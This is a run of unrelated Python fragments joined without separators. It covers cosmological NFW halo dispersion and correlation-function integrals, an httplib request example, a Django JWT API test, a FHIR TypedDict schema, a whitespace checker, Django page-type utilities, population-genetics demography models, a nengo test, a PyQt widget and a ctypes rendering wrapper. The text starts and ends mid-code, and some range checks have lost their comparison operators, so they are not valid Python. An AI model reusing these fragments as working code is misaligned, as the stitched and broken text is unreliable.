1)) sigma2_average = np.sum((Integrand[:,:,2:]+Integrand[:,:,:nlogM-2]+4.*Integrand[:,:,1:nlogM-1])/6.*dlogM, axis=2)#.reshape(nR, nMhalo) return np.sqrt((sigma_halo**2).reshape(1, nMhalo)+sigma2_average/(1.+bMhalo.reshape(1,nMhalo)*xiR)) def NFW_2h_sigma(R0, Mhalo0, z, CosPar, mu=1., fcorr=1., alpha=1.): """ NFW_2h_sigma(R0, Mhalo0, z, CosPar, fcorr=1., alpha=1.): Use only 1E13 as a typical halo mass """ Mhalo = np.array(Mhalo0) nMhalo = Mhalo.size Mhalo = Mhalo.reshape(nMhalo) #if nMhalo>1: raise ValueError("Mhalo must be a scalar") R = np.array(R0) nR = R.size R = R.reshape(nR) RR = np.ones(nMhalo)*R.reshape(nR,1) # sigma_halo = NFW_approx_sigma_halo(Mhalo, z, CosPar) sigma_halo = NFW_sigma_halo(Mhalo, z, CosPar) bMhalo = bias(Mhalo, z, CosPar) # get \xi(R) no bias # xiR = xi_2h_gal_dm(R, 1E13, z, CosPar) # This is impossible # Integration over all masses # Choose one mass (1E13) for approximation MM = np.array([1E12]) nlogM = MM.size # sigma_halo_MM = NFW_approx_sigma_halo(MM, z, CosPar) sigma_halo_MM = NFW_sigma_halo(MM, z, CosPar) sigma_virial_MM = NFW_approx_sigma_virial(MM, z, CosPar)*np.sqrt(3.) # Use the approximation to speed things up sigma_correlation_sqr = np.zeros(nR*nMhalo*nlogM).reshape(nR, nMhalo, nlogM) sigma_Mhalo_corr = np.sqrt(1.-sigma_j_M_sqr(0, Mhalo, z, CosPar)**2/sigma_j_M_sqr(1,Mhalo,z,CosPar)/sigma_j_M_sqr(-1,Mhalo,z,CosPar)) sigma_MM_corr = np.sqrt(1.-sigma_j_M_sqr(0, MM, z, CosPar)**2/sigma_j_M_sqr(1,MM,z,CosPar)/sigma_j_M_sqr(-1,MM,z,CosPar)) prefix = (100.*CosPar['h']*f_Legendre(0,CosPar))**2 for j in np.arange(nMhalo): sigma_correlation_sqr[:,j,:] = sigma_j_r_M1_M2_sqr(-1, R, Mhalo[j], MM, z, CosPar)*prefix*sigma_Mhalo_corr[j]*sigma_MM_corr #for i in np.arange(nR): # sigma_correlation_sqr[i,j,:] = sigma_j_r_M1_M2_sqr(-1, R[i], Mhalo[j], MM, z, CosPar)*prefix*sigma_Mhalo_corr[j]*sigma_MM_corr # Integrand = (dn_dlogM*bM*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar)*(sigma_halo_MM**2+ # (mu*sigma_virial_MM)**2)).reshape(1,1,nlogM)*(1.+bMhalo.reshape(1, nMhalo, 1)*bM.reshape(1,1,nlogM)*xiR.reshape(nR, nMhalo, 1)) # Integrand = (dn_dlogM*bM*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar)*((sigma_halo_MM**2+ # (mu*sigma_virial_MM)**2).reshape(1,1,nlogM)-2*sigma_correlation_sqr))*(1.+bMhalo.reshape(1, nMhalo, 1)*bM.reshape(1,1,nlogM)*xiR.reshape(nR, nMhalo, 1)) # sigma2_average = np.sum((Integrand[:,:,2:]+Integrand[:,:,:nlogM-2]+4.*Integrand[:,:,1:nlogM-1])/6.*dlogM, axis=2)#.reshape(nR, nMhalo) sigma2_average = (sigma_halo**2).reshape(1,nMhalo)+(sigma_halo_MM**2).reshape(1,nMhalo)+((mu*sigma_virial_MM)**2).reshape(1,nMhalo)-2.*sigma_correlation_sqr.reshape(nR,nMhalo)*1. # print 'sigma_correlation_sqr: ', sigma_correlation_sqr.shape # print 'sigma2_average: ', sigma_correlation_sqr.shape # print 'sigma_halo_MM: ', sigma_halo_MM.shape # print sigma_halo_MM # print mu*sigma_virial_MM # print sigma_correlation_sqr return np.sqrt(sigma2_average) # return np.sqrt((sigma_halo**2).reshape(1,nMhalo)+(sigma_halo_MM**2).reshape(1,nMhalo)+((mu*sigma_virial_MM)**2).reshape(1,nMhalo)) def NFW_project_2h_sigma(y, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_project_2h_sigma(y, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ # Need to do some argumente/keyword checking bbeta = 0.0 R_min = 1E-5 R_max = 2E3 if min(y)(R_max/2.): raise ValueError("y too large") y = np.array(y) y = y.reshape(y.shape[0], y.size/y.shape[0]) # Convert it to y(ny,1) or y(ny,nMhalo) ny = y.shape[0] Mhalo = np.array(Mhalo) nMhalo = Mhalo.size yy = np.ones(nMhalo)*y.reshape(ny,1) bMhalo = bias(Mhalo, z, CosPar) # Set up interpolation profiles dlogR = 1E-2 R = np.exp(np.arange(np.log(R_min)-2.*dlogR, np.log(R_max)+2.*dlogR, dlogR)) nR = R.shape[0] R = np.ones(nMhalo)*R.reshape(nR, 1) # R(nR, nMhalo) xiR = xi_2h_gal_dm(R, 1E13, z, CosPar) # no bias #rhoR = NFW_profile(R, Mhalo, z, CosPar, fcorr, alpha)*NFW_sigma(R, Mhalo, z, CosPar, fcorr, alpha)**2 # sigma^2*rhoR(nR, nMhalo) #rhoR = (1.+bMhalo*xiR)*NFW_2h_sigma(R, Mhalo, z, CosPar, fcorr, alpha)**2/3. # sigma^2*rhoR(nR, nMhalo) #Norm_rhoR = (1.+bMhalo*xiR) # sigma^2*rhoR(nR, nMhalo) rhoR = xiR*NFW_2h_sigma(R, Mhalo, z, CosPar, fcorr, alpha)**2/3. # sigma^2*rhoR(nR, nMhalo) Norm_rhoR = xiR # sigma^2*rhoR(nR, nMhalo) SS_max = R_max/2.0 Sigma_y = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) Norm_Sigma_y = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) # Very difficult to vectorize without approximation # Let's settle for what we have now dlogs = 1E-3 # 10% better than 1E-2 for i in np.arange(nMhalo): f = interpolate.interp1d(R[:,i], rhoR[:,i]) Norm_f = interpolate.interp1d(R[:,i], Norm_rhoR[:,i]) Sigma_integrand = lambda R, s: (1.-bbeta*s*s/R/R)*2.*f(R)*R**2/np.sqrt(R*R-s*s) # dlogR Norm_Sigma_integrand = lambda R, s: 2.*Norm_f(R)*R**2/np.sqrt(R*R-s*s) # dlogR # s_max = max(SS_max, max(yy[:,i])*1.1) s_max = SS_max s_min = yy[:,i] for j in np.arange(ny): ss = np.exp(np.arange(np.log(s_min[j])+dlogs,np.log(s_max)+dlogs,dlogs)) nlogs = ss.size Integrand = Sigma_integrand(ss, s_min[j]) Norm_Integrand = Norm_Sigma_integrand(ss, s_min[j]) Sigma_y[j, i] = np.sum((Integrand[2:]+Integrand[:nlogs-2]+4.*Integrand[1:nlogs-1])/6.*dlogs)*1E6 Norm_Sigma_y[j, i] = np.sum((Norm_Integrand[2:]+Norm_Integrand[:nlogs-2]+4.*Norm_Integrand[1:nlogs-1])/6.*dlogs)*1E6 return np.sqrt(Sigma_y/Norm_Sigma_y) def xi_Legendre_monopole(R, Mhalo, z, CosPar): """ xi_Legendre_monopole(R, Mhalo, z, CosPar): """ Mhalo = np.array(Mhalo) nMhalo = Mhalo.size bMhalo = bias(Mhalo, z, CosPar) f = f_Legendre(z, CosPar)/bMhalo coeff = 1.+2./3.*f+0.2*f**2 xi_R = xi_2h_gal_dm(R, Mhalo, z, CosPar) # no bias return coeff*xi_R*bMhalo.reshape(1,nMhalo) def xi_Legendre_multipole(y, Mhalo, z, CosPar): """ quadrupole, hexadecapole = xi_Legendre_multipole(R, Mhalo, z, CosPar): """ R_min = 1E-5 R_max = 2E3 if min(y)R_max: raise ValueError("y too large") y = np.array(y) y = y.reshape(y.shape[0], y.size/y.shape[0]) # Convert it to y(ny,1) or y(ny,nMhalo) ny = y.shape[0] Mhalo = np.array(Mhalo) nMhalo = Mhalo.size yy = np.ones(nMhalo)*y.reshape(ny,1) bMhalo = bias(Mhalo, z, CosPar) f = f_Legendre(z, CosPar)/bMhalo coeff_quadrupole = 4./3.*f+4./7.*f*f coeff_hexadecapole = 8./35.*f*f xi_y = xi_2h_gal_dm(y, Mhalo, z, CosPar) # no bias dlogR = 1E-2 R = np.exp(np.arange(np.log(R_min)-2.*dlogR, np.log(R_max)+2.*dlogR, dlogR)) nR = R.shape[0] R = np.ones(nMhalo)*R.reshape(nR, 1) # R(nR, nMhalo) xi_R = xi_2h_gal_dm(R, Mhalo, z, CosPar) # no bias xi_y_bar = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) xi_y_bar2 = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) # Very difficult to vectorize without approximation # Let's settle for what we have now dlogs = 1E-3 # 10% better than 1E-2 for i in np.arange(nMhalo): f_interpol = interpolate.interp1d(R[:,i], xi_R[:,i]) xiy_qua_integrand = lambda R: f_interpol(R)*R**3 # dlogR xiy_hex_integrand = lambda R: f_interpol(R)*R**5 # dlogR s_max = yy[:,i] s_min = R_min for j in np.arange(ny): ss = np.exp(np.arange(np.log(s_min)+dlogs,np.log(s_max[j])+dlogs,dlogs)) nlogs = ss.size qua_Integrand = xiy_qua_integrand(ss) hex_Integrand = xiy_hex_integrand(ss) xi_y_bar[j, i] = np.sum((qua_Integrand[2:]+qua_Integrand[:nlogs-2]+4.*qua_Integrand[1:nlogs-1])/6.*dlogs)*3./s_max[j]**3 xi_y_bar2[j, i] = np.sum((hex_Integrand[2:]+hex_Integrand[:nlogs-2]+4.*hex_Integrand[1:nlogs-1])/6.*dlogs)*5/s_max[j]**5 # Calculate xiR_bar & xiR_bar2 xiR_quadrupole = coeff_quadrupole*(xi_y-xi_y_bar) xiR_hexadecapole = coeff_hexadecapole*(xi_y+2.5*xi_y_bar-3.5*xi_y_bar2) return xiR_quadrupole*bMhalo.reshape(1,nMhalo), xiR_hexadecapole*bMhalo.reshape(1,nMhalo) from httplib import HTTP req = HTTP("www.example.com") req.putrequest("GET", "/index.html") req.putheader("Accept", "text/html") req.putheader("User-Agent", "MyPythonScript") req.endheaders() ec, em, h = req.getreply() print(ec, em) # 200 OK fd = req.getfile() textlines = fd.read() fd.close()blargg/__init__.py default_app_config = 'blargg.apps.Blargg' __version__ = "0.7.0" veggieavocado/Woobaktests/django/test_profile_api.py from django.contrib.auth import get_user_model from django.test import TestCase from django.core.urlresolvers import reverse from rest_framework import status from rest_framework.test import APIClient from rest_framework_jwt import utils, views from rest_framework_jwt.compat import get_user_model from rest_framework_jwt.settings import api_settings, DEFAULTS import json, os from django.utils.encoding import smart_text from accounts.models import ( Profile ) User = get_user_model() class UserAPITestCase(TestCase): ''' User REST API testing module ''' def setUp(self): print('Starting User API test') self.client = APIClient(enforce_csrf_checks=True) self.username = 'lee' self.email = '' self.password = '' # create new user to send post requests self.user = { 'username': self.username, 'email': self.email, 'password': , } # 테스트영 user-data 생성 self.userdata = { 'username': self.username, 'password': , } response = self.client.post( '/api/accounts/user/', self.user, format='json' ) self.assertEqual(User.objects.all().count(), 1, msg='user data not created properly') self.assertEqual(response.status_code, status.HTTP_201_CREATED) self.assertEqual(User.objects.first().username, self.user['username']) self.assertEqual(User.objects.first().email, self.user['email']) def test_jwt_token(self): print('Strating JWT token test') testing = os.environ['TRAVIS'] if 'TRAVIS' in os.environ else 'False' if testing == 'True': assert 1 == 1 # 트레브시에서는 테스트 넘어가기 else: response = self.client.post( '/api/accounts/api-token-auth/', json.dumps(self.userdata), content_type='application/json' ) response_content = json.loads(smart_text(response.content)) decoded_payload = utils.jwt_decode_handler(response_content['token']) self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(decoded_payload['username'], self.username) token = response.data['token'] # Get Test response = self.client.get( '/api/accounts/profile/', format='json', HTTP_AUTHORIZATION='JWT ' + token ) self.assertEqual(response.status_code, status.HTTP_200_OK) # Get Test without token response = self.client.get( '/api/accounts/profile/', format='json' ) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) user_orm = User.objects.get(username='lee') profile = Profile.objects.get(user=user_orm).user.username profile = { 'user': profile, 'name': 'Hoom', 'phone' : '01020003000', 'address': 'Seoul', } # put Test response = self.client.put( '/api/accounts/profile/lee/', profile, HTTP_AUTHORIZATION='JWT ' + token, format='json', ) data = response.json() self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(data['name'], 'Hoom') self.assertEqual(data['address'], 'Seoul') # Put Test without token response = self.client.put( '/api/accounts/profile/lee/', profile, format='json' ) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) # delete Test response = self.client.delete( '/api/accounts/user/lee/', HTTP_AUTHORIZATION='JWT ' + token, format='json', ) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT) # deleteTest without token response = self.client.delete( '/api/accounts/profile/lee/', format='json' ) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) self.assertEqual(User.objects.all().count(), 0, msg='user data not delete properly') from typing import Any, List, Literal, TypedDict from .FHIR_Age import FHIR_Age from .FHIR_Annotation import FHIR_Annotation from .FHIR_boolean import FHIR_boolean from .FHIR_canonical import FHIR_canonical from .FHIR_code import FHIR_code from .FHIR_CodeableConcept import FHIR_CodeableConcept from .FHIR_dateTime import FHIR_dateTime from .FHIR_Element import FHIR_Element from .FHIR_FamilyMemberHistory_Condition import FHIR_FamilyMemberHistory_Condition from .FHIR_id import FHIR_id from .FHIR_Identifier import FHIR_Identifier from .FHIR_Meta import FHIR_Meta from .FHIR_Narrative import FHIR_Narrative from .FHIR_Period import FHIR_Period from .FHIR_Range import FHIR_Range from .FHIR_Reference import FHIR_Reference from .FHIR_string import FHIR_string from .FHIR_uri import FHIR_uri # Significant health conditions for a person related to the patient relevant in the context of care for the patient. FHIR_FamilyMemberHistory = TypedDict( "FHIR_FamilyMemberHistory", { # This is a FamilyMemberHistory resource "resourceType": Literal["FamilyMemberHistory"], # The logical id of the resource, as used in the URL for the resource. Once assigned, this value never changes. "id": FHIR_id, # The metadata about the resource. This is content that is maintained by the infrastructure. Changes to the content might not always be associated with version changes to the resource. "meta": FHIR_Meta, # A reference to a set of rules that were followed when the resource was constructed, and which must be understood when processing the content. Often, this is a reference to an implementation guide that defines the special rules along with other profiles etc. "implicitRules": FHIR_uri, # Extensions for implicitRules "_implicitRules": FHIR_Element, # The base language in which the resource is written. "language": FHIR_code, # Extensions for language "_language": FHIR_Element, # A human-readable narrative that contains a summary of the resource and can be used to represent the content of the resource to a human. The narrative need not encode all the structured data, but is required to contain sufficient detail to make it "clinically safe" for a human to just read the narrative. Resource definitions may define what content should be represented in the narrative to ensure clinical safety. "text": FHIR_Narrative, # These resources do not have an independent existence apart from the resource that contains them - they cannot be identified independently, and nor can they have their own independent transaction scope. "contained": List[Any], # May be used to represent additional information that is not part of the basic definition of the resource. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer can define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. "extension": List[Any], # May be used to represent additional information that is not part of the basic definition of the resource and that modifies the understanding of the element that contains it and/or the understanding of the containing element's descendants. Usually modifier elements provide negation or qualification. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer is allowed to define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. Applications processing a resource are required to check for modifier extensions.Modifier extensions SHALL NOT change the meaning of any elements on Resource or DomainResource (including cannot change the meaning of modifierExtension itself). "modifierExtension": List[Any], # Business identifiers assigned to this family member history by the performer or other systems which remain constant as the resource is updated and propagates from server to server. "identifier": List[FHIR_Identifier], # The URL pointing to a FHIR-defined protocol, guideline, orderset or other definition that is adhered to in whole or in part by this FamilyMemberHistory. "instantiatesCanonical": List[FHIR_canonical], # The URL pointing to an externally maintained protocol, guideline, orderset or other definition that is adhered to in whole or in part by this FamilyMemberHistory. "instantiatesUri": List[FHIR_uri], # Extensions for instantiatesUri "_instantiatesUri": List[FHIR_Element], # A code specifying the status of the record of the family history of a specific family member. "status": Literal["partial", "completed", "entered-in-error", "health-unknown"], # Extensions for status "_status": FHIR_Element, # Describes why the family member's history is not available. "dataAbsentReason": FHIR_CodeableConcept, # The person who this history concerns. "patient": FHIR_Reference, # The date (and possibly time) when the family member history was recorded or last updated. "date": FHIR_dateTime, # Extensions for date "_date": FHIR_Element, # This will either be a name or a description; e.g. "", "my cousin with the red hair". "name": FHIR_string, # Extensions for name "_name": FHIR_Element, # The type of relationship this person has to the patient (father, mother, brother etc.). "relationship": FHIR_CodeableConcept, # The birth sex of the family member. "sex": FHIR_CodeableConcept, # The actual or approximate date of birth of the relative. "bornPeriod": FHIR_Period, # The actual or approximate date of birth of the relative. "bornDate": str, # Extensions for bornDate "_bornDate": FHIR_Element, # The actual or approximate date of birth of the relative. "bornString": str, # Extensions for bornString "_bornString": FHIR_Element, # The age of the relative at the time the family member history is recorded. "ageAge": FHIR_Age, # The age of the relative at the time the family member history is recorded. "ageRange": FHIR_Range, # The age of the relative at the time the family member history is recorded. "ageString": str, # Extensions for ageString "_ageString": FHIR_Element, # If true, indicates that the age value specified is an estimated value. "estimatedAge": FHIR_boolean, # Extensions for estimatedAge "_estimatedAge": FHIR_Element, # Deceased flag or the actual or approximate age of the relative at the time of death for the family member history record. "deceasedBoolean": bool, # Extensions for deceasedBoolean "_deceasedBoolean": FHIR_Element, # Deceased flag or the actual or approximate age of the relative at the time of death for the family member history record. "deceasedAge": FHIR_Age, # Deceased flag or the actual or approximate age of the relative at the time of death for the family member history record. "deceasedRange": FHIR_Range, # Deceased flag or the actual or approximate age of the relative at the time of death for the family member history record. "deceasedDate": str, # Extensions for deceasedDate "_deceasedDate": FHIR_Element, # Deceased flag or the actual or approximate age of the relative at the time of death for the family member history record. "deceasedString": str, # Extensions for deceasedString "_deceasedString": FHIR_Element, # Describes why the family member history occurred in coded or textual form. "reasonCode": List[FHIR_CodeableConcept], # Indicates a Condition, Observation, AllergyIntolerance, or QuestionnaireResponse that justifies this family member history event. "reasonReference": List[FHIR_Reference], # This property allows a non condition-specific note to the made about the related person. Ideally, the note would be in the condition property, but this is not always possible. "note": List[FHIR_Annotation], # The significant Conditions (or condition) that the family member had. This is a repeating section to allow a system to represent more than one condition per resource, though there is nothing stopping multiple resources - one per condition. "condition": List[FHIR_FamilyMemberHistory_Condition], }, total=False, ) import configparser import fnmatch import subprocess import sys def main(): config = configparser.ConfigParser() config.read("setup.cfg") section = "check_whitespace" ignore_files = config.get(section, "ignore_files", fallback="") ignore_files = [s.strip() for s in ignore_files.split(",")] ignore_files = [s for s in ignore_files if s] p = subprocess.run( ["git", "ls-files"], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, check=True, ) filenames = p.stdout.decode().splitlines() failed = False for filename in filenames: if any(True for p in ignore_files if fnmatch.fnmatch(filename, p)): continue try: check(filename) except UnicodeDecodeError: pass except Exception as e: failed = True print("{}: {}".format(filename, e)) return failed def check(filename): last_is_empty = False with open(filename, "r", newline="") as f: for i, line in enumerate(f): if line.endswith("\r") or line.endswith("\r\n"): raise Exception("Carriage returns are not allowed") if not line.endswith("\n"): raise Exception("Missing newline at end of file") try: last_char = line[-2] except IndexError: last_is_empty = True else: if last_char.isspace(): raise Exception("Trailing whitespace at end of line {}".format(i + 1)) last_is_empty = False if last_is_empty: raise Exception("Trailing newlines at end of file") if __name__ == "__main__": sys.exit(int(main())) fluent_pages/management/__init__.py import django from django.db import DEFAULT_DB_ALIAS if django.VERSION >= (1, 8): from django.core.management import CommandError # No longer possible, Django 1.8 always uses the actual model name. def update_model_prefix(model, db=DEFAULT_DB_ALIAS, verbosity=2): raise CommandError("This feature is no longer supported as of Django 1.8") else: from django.contrib.contenttypes.models import ContentType from django.db.models import signals, get_models from django.dispatch import receiver from fluent_pages.models import UrlNode @receiver(signals.post_syncdb) def _on_post_syncdb(app, verbosity=2, db=DEFAULT_DB_ALIAS, **kwargs): """ Prefix the ContentType objects of pagetypes, to make them recognizable. Runs automatically at syncdb, and initial south model creation. """ app_models = [m for m in get_models(app) if issubclass(m, UrlNode)] for model in app_models: update_model_prefix(model, verbosity=verbosity, db=db) def update_model_prefix(model, db=DEFAULT_DB_ALIAS, verbosity=2): """ Internal function to update all model prefixes. """ prefix = "pagetype:" ct = ContentType.objects.get_for_model(model) new_name = u"{0} {1}".format(prefix, model._meta.verbose_name_raw).strip() if ct.name != new_name: # Django 1.4/1.5 compatible .save(update_fields=('name',)) look-a-like ContentType.objects.using(db).filter(pk=ct.id).update(name=new_name) if verbosity >= 1: print(" - Updated ContentType title for {0}.{1}".format(model._meta.app_label, model._meta.object_name)) return True return False import numpy as np from moments.LD import Demography from moments.LD.LDstats_mod import LDstats def snm(params=None, rho=None, theta=0.001, pop_ids=None): """ Equilibrium neutral model rho: population-scaled recombination rate (4Nr), given as scalar or list of rhos theta: population-scaled mutation rate (4Nu) """ Y = Demography.equilibrium(rho=rho, theta=theta) Y = LDstats(Y, num_pops=1, pop_ids=pop_ids) return Y def two_epoch(params, rho=None, theta=0.001, pop_ids=None): """ Two epoch model params: = (nu,T), where nu is the new population size, integrated for time T rho: population-scaled recombination rate (4Nr), given as scalar or list of rhos theta: population-scaled mutation rate (4Nu) """ nu,T = params Y = Demography.equilibrium(rho=rho, theta=theta) Y = LDstats(Y, num_pops=1, pop_ids=pop_ids) Y.integrate([nu], T, rho=rho, theta=theta) return Y def three_epoch(params, rho=None, theta=0.001, pop_ids=None): """ Three epoch model params: = (nu1,nu2,T1,T2), where nus are the population size, integrated for times T1 and T2 rho: population-scaled recombination rate (4Nr), given as scalar or list of rhos theta: population-scaled mutation rate (4Nu) """ nu1,nu2,T1,T2 = params Y = Demography.equilibrium(rho=rho, theta=theta) Y = LDstats(Y, num_pops=1, pop_ids=pop_ids) Y.integrate([nu1], T1, rho=rho, theta=theta) Y.integrate([nu2], T2, rho=rho, theta=theta) return Y def growth(params, order=2, rho=0, theta=0.001, pop_ids=None): """ Exponential growth (or decay) model params: = (nuF,T), nu F is the final population size after time T (starting from nu=1) rho: population-scaled recombination rate (4Nr), given as scalar or list of rhos theta: population-scaled mutation rate (4Nu) """ nuF,T = params Y = Demography.equilibrium(rho=rho, theta=theta) Y = LDstats(Y, num_pops=1, pop_ids=pop_ids) nu_func = lambda t: [np.exp( np.log(nuF) *t/T)] Y.integrate(nu_func, T, rho=rho, theta=theta) return Y def bottlegrowth(params, ns=200, rho=0, theta=0.001, pop_ids=None): """ Exponential growth (or decay) model after size change params: = (nuB,nuF,T), nu F is the final population size after time T, starting from instantaneous population size change of nuB rho: population-scaled recombination rate (4Nr), given as scalar or list of rhos theta: population-scaled mutation rate (4Nu) """ nuB,nuF,T = params Y = Demography.equilibrium(rho=rho, theta=theta) Y = LDstats(Y, num_pops=1, pop_ids=pop_ids) nu_func = lambda t: [nuB * np.exp( np.log(nuF/nuB) *t/T)] Y.integrate(nu_func, T, rho=rho, theta=theta) return Y ConorPQuinn/NengoDecimal import numpy as np import pytest import nengo from nengo.dists import UniformHypersphere from nengo.utils.connection import target_function @pytest.mark.parametrize("dimensions", [1, 4]) @pytest.mark.parametrize("radius", [1, 2.0]) def test_target_function(Simulator, nl_nodirect, plt, dimensions, radius, seed, rng): eval_points = UniformHypersphere().sample(1000, dimensions, rng=rng) eval_points *= radius f = lambda x: x ** 2 targets = f(eval_points) model = nengo.Network(seed=seed) with model: model.config[nengo.Ensemble].neuron_type = nl_nodirect() inp = nengo.Node(lambda t: np.sin(t * 2 * np.pi) * radius) ens1 = nengo.Ensemble(40 * dimensions, dimensions, radius=radius) n1 = nengo.Node(size_in=dimensions) n2 = nengo.Node(size_in=dimensions) transform = np.linspace(1, -1, num=dimensions).reshape(-1, 1) nengo.Connection(inp, ens1, transform=transform) # pass in eval_points and targets nengo.Connection(ens1, n1, **target_function(eval_points, targets)) # same, but let the builder apply f nengo.Connection(ens1, n2, function=f) probe1 = nengo.Probe(n1, synapse=0.03) probe2 = nengo.Probe(n2, synapse=0.03) sim = Simulator(model) sim.run(0.5) plt.subplot(2, 1, 1) plt.plot(sim.trange(), sim.data[probe1]) plt.title('Square manually with target_function') plt.subplot(2, 1, 2) plt.plot(sim.trange(), sim.data[probe2]) plt.title('Square by passing in function to connection') assert np.allclose(sim.data[probe1], sim.data[probe2], atol=0.2 * radius) mafster/easypyqt4 from PyQt4 import QtGui from easypyqt.widget import basicwidget class CollapsibleWidget(basicwidget.BasicWidget): def __init__(self, vertical=True, panel_vertical_layout=True, length=200): super(CollapsibleWidget, self).__init__(vertical=vertical) # Data self.length = length # Widget self.header_widget = HeaderWidget(vertical=not vertical) self.panel_widget = basicwidget.BasicWidget(vertical=panel_vertical_layout) # Layout self.basic_layout.addWidget(self.header_widget) self.basic_layout.addWidget(self.panel_widget) def add_widget_to_header(self, widget): self.header_widget.basic_layout.addWidget(widget) def add_widget_to_panel(self, widget): self.panel_widget.basic_layout.addWidget(widget) if __name__ == '__main__': import sys app = QtGui.QApplication(sys.argv) cw = CollapsibleWidget() cw.header_widget.basic_layout.addWidget(QtGui.QLabel('testo!')) cw.panel_widget.basic_layout.addWidget(QtGui.QLabel('PANO!!')) cw.show() sys.exit(app.exec_()) import ctypes from PIL import Image, ImageOps import numpy as np class meshWrapper(object): def __init__(self, lib_file='./utils/libPythonWrapper.so'): self.lib = ctypes.cdll.LoadLibrary(lib_file) # extern "C" void load_totalmodel(char* obj_file, char* model_file, char* pca_file); self.lib.load_totalmodel.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p] self.lib.load_totalmodel.restype = None self.obj_file = ctypes.create_string_buffer('./utils/mesh_nofeet.obj'.encode('ascii')) self.model_file = ctypes.create_string_buffer('./utils/adam_v1_plus2.json'.encode('ascii')) self.pca_file = ctypes.create_string_buffer('./utils/adam_blendshapes_348_delta_norm.json'.encode('ascii')) self.correspondence_file = ctypes.create_string_buffer('./utils/correspondences_nofeet.txt'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/adam_cocoplus_regressor.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/reg_human36_angjooOrder_ls.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/reg_human36_angjooOrder_nonneg.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/reg_combined_angjoo1.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/regressor_0n.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/reg_human36_angjooOrder_regressor2_nonneg.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/reg_human36_angjooOrder_regressor2_nonneg_root.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/regressor_0n1.json'.encode('ascii')) self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/regressor_0n1_root.json'.encode('ascii')) # extern "C" void fit_total3d(double* targetJoint, double* pose, double* coeff, double* trans) self.lib.fit_total3d.argtypes = [ctypes.POINTER(ctypes.c_double)] * 5 self.lib.fit_total3d.restype = None self.lib.fit_total2d.argtypes = [ctypes.POINTER(ctypes.c_double)] * 6 self.lib.fit_total2d.restype = None self.lib.fit_total3d2d.argtypes = [ctypes.POINTER(ctypes.c_double)] * 7 self.lib.fit_total3d2d.restype = None # extern "C" void fit_PAF_vec(double* targetJoint2d, double* PAF_vec, double* calibK, double* pose, double* coeff, double* trans, double* face_coeff) self.lib.fit_PAF_vec.argtypes = [ctypes.POINTER(ctypes.c_double)] * 8 + [ctypes.c_uint, ctypes.c_bool, ctypes.c_bool, ctypes.c_bool] self.lib.fit_PAF_vec.restype = None # Eigen::Matrix m_adam_pose; //62 ==TotalModel::NUM_JOINTS # Eigen::Matrix m_adam_coeffs; //30 ==TotalModel::NUM_SHAPE_COEFFICIENTS # Eigen::Vector3d m_adam_t; self.cpose = (ctypes.c_double * (62 * 3))() self.ccoeff = (ctypes.c_double * 30)() self.ctrans = (ctypes.c_double * 3)() self.cface_coeff = (ctypes.c_double * 200)() self.ctarget_array = (ctypes.c_double * ((62 + 70 + 6) * 3))() self.ctarget_array_2d = (ctypes.c_double * ((63 + 70 + 6) * 2))() self.cret_bytes = (ctypes.c_ubyte * (600 * 600 * 4))() self.cfull_bytes = (ctypes.c_ubyte * (1920 * 1080 * 4))() self.cortho_bytes = (ctypes.c_ubyte * (1920 * 1080 * 4))() self.PAF_array = (ctypes.c_double * (63 * 3))() self.out_joint = (ctypes.c_double * (65 * 3))() # regressor 2: 19 (small coco regressor) + 20 (hand) + 20 (hand) + 6 (feet) self.calibK = (ctypes.c_double * 9)() # extern "C" void Total_visualize(GLubyte* ret_bytes, double* targetJoint, uint CameraMode, uint position, bool meshSolid, float scale, int vis_type) self.lib.Total_visualize.argtypes = [ctypes.POINTER(ctypes.c_ubyte), ctypes.POINTER(ctypes.c_double), ctypes.c_uint, ctypes.c_uint, ctypes.c_bool, ctypes.c_float, ctypes.c_int, ctypes.c_bool] self.lib.Total_visualize.restype = None self.lib.VisualizeSkeleton.argtypes = [ctypes.POINTER(ctypes.c_ubyte), ctypes.POINTER(ctypes.c_double), ctypes.c_uint, ctypes.c_uint, ctypes.c_float] self.lib.VisualizeSkeleton.restype = None self.lib.init_renderer.argtypes = [] self.lib.init_renderer.restype = None self.lib.reconstruct_adam.argtypes = [ctypes.POINTER(ctypes.c_double)] * 4 + [ctypes.c_int] self.lib.reconstruct_adam.restype = None self.lib.reconstruct_adam_mesh.argtypes = [ctypes.POINTER(ctypes.c_double)] * 4 + [ctypes.c_int, ctypes.c_bool] self.lib.reconstruct_adam_mesh.restype = None self.lib.fit_h36m_groundtruth.argtypes = [ctypes.POINTER(ctypes.c_double)] * 5 